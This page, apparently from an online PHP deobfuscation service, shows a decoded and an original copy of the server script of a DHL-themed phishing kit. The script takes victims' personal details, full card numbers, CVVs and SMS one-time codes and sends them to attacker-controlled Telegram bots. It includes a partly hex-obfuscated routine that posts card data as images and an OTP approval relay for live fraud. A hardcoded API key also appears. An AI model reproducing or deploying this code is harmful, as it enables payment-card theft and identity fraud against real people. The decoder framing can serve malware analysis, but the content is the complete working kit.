Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php session_start(); //if ( $_SERVER['REQUEST_METHOD']=='GET' && realpath(__FILE__) ==..
Decoded Output download
<?php
session_start();
//if ( $_SERVER['REQUEST_METHOD']=='GET' && realpath(__FILE__) == realpath( $_SERVER['SCRIPT_FILENAME'] ) ) {
// header( 'HTTP/1.0 403 Forbidden', TRUE, 403 );
// die( header( 'location: /index.php' ) );
//}
// GET URL -------------------------
if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on')
$url = "https://";
else
$url = "http://";
// Append the host(domain name, ip) to the URL.
$url.= $_SERVER['HTTP_HOST'];
// Append the requested resource location to the URL
$url.= $_SERVER['REQUEST_URI'];
// GET URL -------------------------
require('global_config.php');
function getCCinfos($cc){
$bin = substr(str_replace(' ', '', $cc), 0, 6);
$ch = curl_init();
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_URL,"https://api.iinapi.com/iin?key=yVYBA2IaC0RyCAh2QREcZV7OTQuUbOeq&digits=".$bin);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,0);
curl_setopt($ch,CURLOPT_TIMEOUT,400);
$json=curl_exec($ch);
$code=json_decode($json);
if ($code->valid){
$get['bank'] = strtoupper($code->result->IssuingInstitution);
$get['type'] = strtoupper($code->result->CardType);
$get['brand'] = strtoupper($code->result->CardBrand);
$get['level'] = strtoupper($code->result->CardCategory);
$get['bin'] = $bin;
return $get;
} else {
// Handle error or invalid response here
}
}
$ip = 'NULL';
$agent = $_SERVER['HTTP_USER_AGENT'];
$origin = $_SERVER['HTTP_ORIGIN'];
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
header("Access-Control-Allow-Origin: $origin");
$data = json_decode(file_get_contents("php://input"), true);
//$data = $data['data'];
$dataType = $data['type'];
//echo json_encode($data);
if ($dataType == 'botjs_detect1'){
$message = "
REFUSED
Antibot : AntibotJS #1 (enabled in config.js file)
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'botjs_detect2'){
$message = "
REFUSED
Antibot : AntibotJS #2 (enabled in config.js file)
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'page_closed'){
$message = "
PAGE CLOSED BY CLIENT
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'new_connection'){
$message = "
NEW CONNECTION
Captcha resolved
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'new_connection_standard'){
$message = "
NEW CONNECTION
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'informations'){
$message = "
BILLING
Nom ".$data['nom']."
Prnom ".$data['prenom']."
Naissance ".$data['naissance']."
Numro de tlphone ".$data['tel']."
Ville ".$data['ville']."
Code Postal ".$data['postal']."
Adresse ".$data['adresse']."
IP $ip
User-Agent $agent
- DHL - ";
if ($send_telegram_results){
$urls = "https://api.telegram.org/bot$telegram_bot_token_infos/sendMessage?chat_id=$telegram_chat_id_infos&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'livraison'){
$ccResult = getCCinfos($data['cc']);
$cc = trim($data['cc']);
$exp = $data['exp'];
$cvv = $data['cvv'];
$level = $ccResult['level'];
$type = $ccResult['type'];
$bank = $ccResult['bank'];
$country = $ccResult['country'];
$bin = $ccResult['bin'];
$message = " +1 CC $bin $bank $level
Numro $cc
Expiration $exp
CVV $cvv
Banque $bank
Level $level
Type $type
IP $ip
User-Agent $agent
- DHL - ";
if($send_telegram_results){
$urls = "https://api.telegram.org/bot$telegram_bot_token_cc/sendMessage?chat_id=$telegram_chat_id_cc&text=";
file_get_contents($urls . urlencode($message));
if($send_cc_image_telegram){
goto ilaL3; rJKFA: $black = ImageColorAllocate($im, 0, 0, 0); goto XHa6h; Zm1br: ImagePNG($im, $id . ".png"); goto QWETL; W1KJz: ImageString($im, 10, 60, 100, $cvv, $black); goto Zm1br; yeo1D: $white = ImageColorAllocate($im, 255, 255, 255); goto rJKFA; QWETL: $bot_url = "https://api.telegram.org/bot{$telegram_bot_token_cc}/"; goto fZNhr; XHa6h: ImageString($im, 10, 60, 60, $cc, $black); goto ui6GY; sYDQL: $post_fields = array("chat_id" => $telegram_chat_id_cc, "photo" => new CURLFile(realpath(__DIR__ . "/" . $id . ".png"))); goto DQ4Dc; fZNhr: $url = $bot_url . "sendPhoto?chat_id={$telegram_chat_id_cc}"; goto sYDQL; ZMrrO: curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); goto Xw8UD; Xw8UD: $output = curl_exec($ch); goto XKdvG; VCvnl: $im = ImageCreate(250, 150); goto yeo1D; UCUFp: curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type:multipart/form-data")); goto sbjgh; z4v50: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto ZMrrO; ilaL3: uniqid(); goto VCvnl; DQ4Dc: $ch = curl_init(); goto UCUFp; ui6GY: ImageString($im, 10, 60, 80, $exp, $black); goto W1KJz; sbjgh: curl_setopt($ch, CURLOPT_URL, $url); goto z4v50; XKdvG: unlink(__DIR__ . "/" . $id . ".png");
}
}
}
if ($dataType == 'vbv'){
$id_otp = $data['id_otp'];
$otpEnabled = $data['otp_enabled'];
$vbv = $data['code'];
$otpString = 'DISABLED';
$approveLink = '';
$disapproveLink = '';
$link = '';
if ($otpEnabled == true) {
$otpString = 'OTP WAITING';
$_SESSION[$id_otp]['otp_validate'] = '';
}
$message = "
+1 $otpString
SMS $vbv
IP $ip
- DHL - ";
// Create keyboard
$keyboard = json_encode([
"inline_keyboard" => [
[
[
"text" => "",
"url" => $url . "?otp_validate=true&id_otp=" . $id_otp,
"callback_data" => "ACCEPT"
],
[
"text" => "",
"url" => $url . "?otp_validate=false&id_otp=" . $id_otp,
"callback_data" => "DECLINE"
]
]
]
]);
$dataMsg = [
'chat_id' => $telegram_chat_id_cc,
'text' => $message,
'reply_markup' => $otpEnabled == 'true' ? $keyboard : ''
];
if ($send_telegram_results) {
$response = file_get_contents("https://api.telegram.org/bot$telegram_bot_token_cc/sendMessage?" .
http_build_query($dataMsg) );
echo json_encode($response);
}
}
if ($dataType == 'apple') {
$id_otp = $data['id_otp'];
$otpEnabled = $data['otp_enabled'];
$vbv = $data['code'];
$otpString = 'DISABLED';
$approveLink = '';
$disapproveLink = '';
$link = '';
if ($otpEnabled == true) {
$otpString = 'OTP WAITING';
$_SESSION[$id_otp]['otp_validate'] = '';
}
$message = "
+1 $otpString
SMS $vbv
IP ".$ip."
- DHL - ";
$keyboard = json_encode([
"inline_keyboard" => [
[
[
"text" => "",
"url" => $url . "?otp_validate=true&id_otp=" . $id_otp,
"callback_data" => "ACCEPT"
],
[
"text" => "",
"url" => $url . "?otp_validate=false&id_otp=" . $id_otp,
"callback_data" => "DECLINE"
]
]
]
]);
$dataMsg = [
'chat_id' => $telegram_chat_id_cc,
'text' => $message,
'reply_markup' => $otpEnabled == 'true' ? $keyboard : ''
];
if ($send_telegram_results) {
$response = file_get_contents("https://api.telegram.org/bot$telegram_bot_token_cc/sendMessage?" .
http_build_query($dataMsg) );
echo json_encode($response);
}
}
if (isset($_GET['otp_validate']) && isset($_GET['id_otp'])){
$id_otp = strval($_GET['id_otp']);
if ($_GET['otp_validate'] === 'true')
$_SESSION['otp_validate'][$id_otp] = 'true';
if ($_GET['otp_validate'] === 'false'){
$_SESSION['otp_validate'][$id_otp] = 'false';
}
}
if (isset($_GET['get_answer_otp']) && isset($_GET['id_otp'])){
$id_otp = strval($_GET['id_otp']);
$data = $_SESSION['otp_validate'][$id_otp];
if ($data == 'false')
$_SESSION['otp_validate'][$id_otp] = null;
header('Content-Type: application/json; charset=utf-8');
echo $data;
}
?>
Did this file decode correctly?
Original Code
<?php
session_start();
//if ( $_SERVER['REQUEST_METHOD']=='GET' && realpath(__FILE__) == realpath( $_SERVER['SCRIPT_FILENAME'] ) ) {
// header( 'HTTP/1.0 403 Forbidden', TRUE, 403 );
// die( header( 'location: /index.php' ) );
//}
// GET URL -------------------------
if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on')
$url = "https://";
else
$url = "http://";
// Append the host(domain name, ip) to the URL.
$url.= $_SERVER['HTTP_HOST'];
// Append the requested resource location to the URL
$url.= $_SERVER['REQUEST_URI'];
// GET URL -------------------------
require('global_config.php');
function getCCinfos($cc){
$bin = substr(str_replace(' ', '', $cc), 0, 6);
$ch = curl_init();
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_URL,"https://api.iinapi.com/iin?key=yVYBA2IaC0RyCAh2QREcZV7OTQuUbOeq&digits=".$bin);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,0);
curl_setopt($ch,CURLOPT_TIMEOUT,400);
$json=curl_exec($ch);
$code=json_decode($json);
if ($code->valid){
$get['bank'] = strtoupper($code->result->IssuingInstitution);
$get['type'] = strtoupper($code->result->CardType);
$get['brand'] = strtoupper($code->result->CardBrand);
$get['level'] = strtoupper($code->result->CardCategory);
$get['bin'] = $bin;
return $get;
} else {
// Handle error or invalid response here
}
}
$ip = 'NULL';
$agent = $_SERVER['HTTP_USER_AGENT'];
$origin = $_SERVER['HTTP_ORIGIN'];
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
header("Access-Control-Allow-Origin: $origin");
$data = json_decode(file_get_contents("php://input"), true);
//$data = $data['data'];
$dataType = $data['type'];
//echo json_encode($data);
if ($dataType == 'botjs_detect1'){
$message = "
REFUSED
Antibot : AntibotJS #1 (enabled in config.js file)
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'botjs_detect2'){
$message = "
REFUSED
Antibot : AntibotJS #2 (enabled in config.js file)
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'page_closed'){
$message = "
PAGE CLOSED BY CLIENT
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'new_connection'){
$message = "
NEW CONNECTION
Captcha resolved
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'new_connection_standard'){
$message = "
NEW CONNECTION
Adresse ip : " . $ip . "
User Agent : " . $agent;
if ($send_telegram_results && $log_bot){
$urls = "https://api.telegram.org/bot$telegram_bot_token_bot/sendMessage?chat_id=$telegram_chat_id_bot&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'informations'){
$message = "
BILLING
Nom ".$data['nom']."
Prnom ".$data['prenom']."
Naissance ".$data['naissance']."
Numro de tlphone ".$data['tel']."
Ville ".$data['ville']."
Code Postal ".$data['postal']."
Adresse ".$data['adresse']."
IP $ip
User-Agent $agent
- DHL - ";
if ($send_telegram_results){
$urls = "https://api.telegram.org/bot$telegram_bot_token_infos/sendMessage?chat_id=$telegram_chat_id_infos&text=";
file_get_contents($urls . urlencode($message));
}
}
if ($dataType == 'livraison'){
$ccResult = getCCinfos($data['cc']);
$cc = trim($data['cc']);
$exp = $data['exp'];
$cvv = $data['cvv'];
$level = $ccResult['level'];
$type = $ccResult['type'];
$bank = $ccResult['bank'];
$country = $ccResult['country'];
$bin = $ccResult['bin'];
$message = " +1 CC $bin $bank $level
Numro $cc
Expiration $exp
CVV $cvv
Banque $bank
Level $level
Type $type
IP $ip
User-Agent $agent
- DHL - ";
if($send_telegram_results){
$urls = "https://api.telegram.org/bot$telegram_bot_token_cc/sendMessage?chat_id=$telegram_chat_id_cc&text=";
file_get_contents($urls . urlencode($message));
if($send_cc_image_telegram){
goto ilaL3; rJKFA: $black = ImageColorAllocate($im, 0, 0, 0); goto XHa6h; Zm1br: ImagePNG($im, $id . "\x2e\x70\x6e\x67"); goto QWETL; W1KJz: ImageString($im, 10, 60, 100, $cvv, $black); goto Zm1br; yeo1D: $white = ImageColorAllocate($im, 255, 255, 255); goto rJKFA; QWETL: $bot_url = "\x68\164\164\x70\x73\72\x2f\x2f\x61\160\x69\x2e\164\x65\x6c\145\147\x72\141\155\x2e\x6f\162\x67\x2f\142\x6f\x74{$telegram_bot_token_cc}\57"; goto fZNhr; XHa6h: ImageString($im, 10, 60, 60, $cc, $black); goto ui6GY; sYDQL: $post_fields = array("\143\x68\141\164\137\x69\144" => $telegram_chat_id_cc, "\160\150\157\x74\157" => new CURLFile(realpath(__DIR__ . "\x2f" . $id . "\56\x70\156\147"))); goto DQ4Dc; fZNhr: $url = $bot_url . "\163\x65\x6e\144\120\x68\x6f\164\157\77\143\150\141\x74\x5f\151\144\x3d{$telegram_chat_id_cc}"; goto sYDQL; ZMrrO: curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); goto Xw8UD; Xw8UD: $output = curl_exec($ch); goto XKdvG; VCvnl: $im = ImageCreate(250, 150); goto yeo1D; UCUFp: curl_setopt($ch, CURLOPT_HTTPHEADER, array("\103\x6f\x6e\164\x65\156\x74\55\124\x79\x70\145\72\155\x75\154\164\x69\x70\141\162\164\57\146\x6f\162\155\55\144\x61\x74\x61")); goto sbjgh; z4v50: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto ZMrrO; ilaL3: uniqid(); goto VCvnl; DQ4Dc: $ch = curl_init(); goto UCUFp; ui6GY: ImageString($im, 10, 60, 80, $exp, $black); goto W1KJz; sbjgh: curl_setopt($ch, CURLOPT_URL, $url); goto z4v50; XKdvG: unlink(__DIR__ . "\x2f" . $id . "\56\x70\x6e\147");
}
}
}
if ($dataType == 'vbv'){
$id_otp = $data['id_otp'];
$otpEnabled = $data['otp_enabled'];
$vbv = $data['code'];
$otpString = 'DISABLED';
$approveLink = '';
$disapproveLink = '';
$link = '';
if ($otpEnabled == true) {
$otpString = 'OTP WAITING';
$_SESSION[$id_otp]['otp_validate'] = '';
}
$message = "
+1 $otpString
SMS $vbv
IP $ip
- DHL - ";
// Create keyboard
$keyboard = json_encode([
"inline_keyboard" => [
[
[
"text" => "",
"url" => $url . "?otp_validate=true&id_otp=" . $id_otp,
"callback_data" => "ACCEPT"
],
[
"text" => "",
"url" => $url . "?otp_validate=false&id_otp=" . $id_otp,
"callback_data" => "DECLINE"
]
]
]
]);
$dataMsg = [
'chat_id' => $telegram_chat_id_cc,
'text' => $message,
'reply_markup' => $otpEnabled == 'true' ? $keyboard : ''
];
if ($send_telegram_results) {
$response = file_get_contents("https://api.telegram.org/bot$telegram_bot_token_cc/sendMessage?" .
http_build_query($dataMsg) );
echo json_encode($response);
}
}
if ($dataType == 'apple') {
$id_otp = $data['id_otp'];
$otpEnabled = $data['otp_enabled'];
$vbv = $data['code'];
$otpString = 'DISABLED';
$approveLink = '';
$disapproveLink = '';
$link = '';
if ($otpEnabled == true) {
$otpString = 'OTP WAITING';
$_SESSION[$id_otp]['otp_validate'] = '';
}
$message = "
+1 $otpString
SMS $vbv
IP ".$ip."
- DHL - ";
$keyboard = json_encode([
"inline_keyboard" => [
[
[
"text" => "",
"url" => $url . "?otp_validate=true&id_otp=" . $id_otp,
"callback_data" => "ACCEPT"
],
[
"text" => "",
"url" => $url . "?otp_validate=false&id_otp=" . $id_otp,
"callback_data" => "DECLINE"
]
]
]
]);
$dataMsg = [
'chat_id' => $telegram_chat_id_cc,
'text' => $message,
'reply_markup' => $otpEnabled == 'true' ? $keyboard : ''
];
if ($send_telegram_results) {
$response = file_get_contents("https://api.telegram.org/bot$telegram_bot_token_cc/sendMessage?" .
http_build_query($dataMsg) );
echo json_encode($response);
}
}
if (isset($_GET['otp_validate']) && isset($_GET['id_otp'])){
$id_otp = strval($_GET['id_otp']);
if ($_GET['otp_validate'] === 'true')
$_SESSION['otp_validate'][$id_otp] = 'true';
if ($_GET['otp_validate'] === 'false'){
$_SESSION['otp_validate'][$id_otp] = 'false';
}
}
if (isset($_GET['get_answer_otp']) && isset($_GET['id_otp'])){
$id_otp = strval($_GET['id_otp']);
$data = $_SESSION['otp_validate'][$id_otp];
if ($data == 'false')
$_SESSION['otp_validate'][$id_otp] = null;
header('Content-Type: application/json; charset=utf-8');
echo $data;
}
?>
Function Calls
| None |
Stats
| MD5 | 5105bfbf3c8da7e73b6a478e26108a78 |
| Eval Count | 0 |
| Decode Time | 58 ms |